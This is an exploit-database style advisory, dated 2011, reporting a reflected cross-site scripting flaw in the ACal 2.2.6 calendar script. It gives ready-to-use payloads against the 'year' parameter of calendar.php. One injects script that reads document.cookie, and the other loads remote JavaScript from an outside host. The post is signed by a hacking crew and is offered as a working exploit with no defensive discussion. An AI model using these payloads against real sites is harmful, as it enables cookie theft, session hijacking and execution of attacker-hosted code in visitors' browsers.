ACal version 2.2.6 suffers from a cross site scripting vulnerability.
690e0cae40ac71cd5f6756464561786f1f34425d0714994ef9b5244906f298af
=================================================================
=ACal-2.2.6 XSS Vulnerability
=================================================================
# Exploit Title: ACal-2.2.6 XSS Vulnerability
# Date: 02.09.2011
# Author: T0xic
# Category: webapps/0day
# Script url: https://acalproj.sourceforge.net/
# Version: N/A
# Tested on:
# CVE :
[ EXPL0!T ]
=> https://www.example.com/calendar/calendar.php?year=<script>alert(document.cookie)</script>
Exemple exploit code :
=> ><SCRIPT SRC=https://ha.ckers.org/xss.js></SCRIPT><
#================[ Exploited By T0xic ]================
#Greets To : Dz Offenders Cr3w < Algerians HaCkerS > =
#======================================================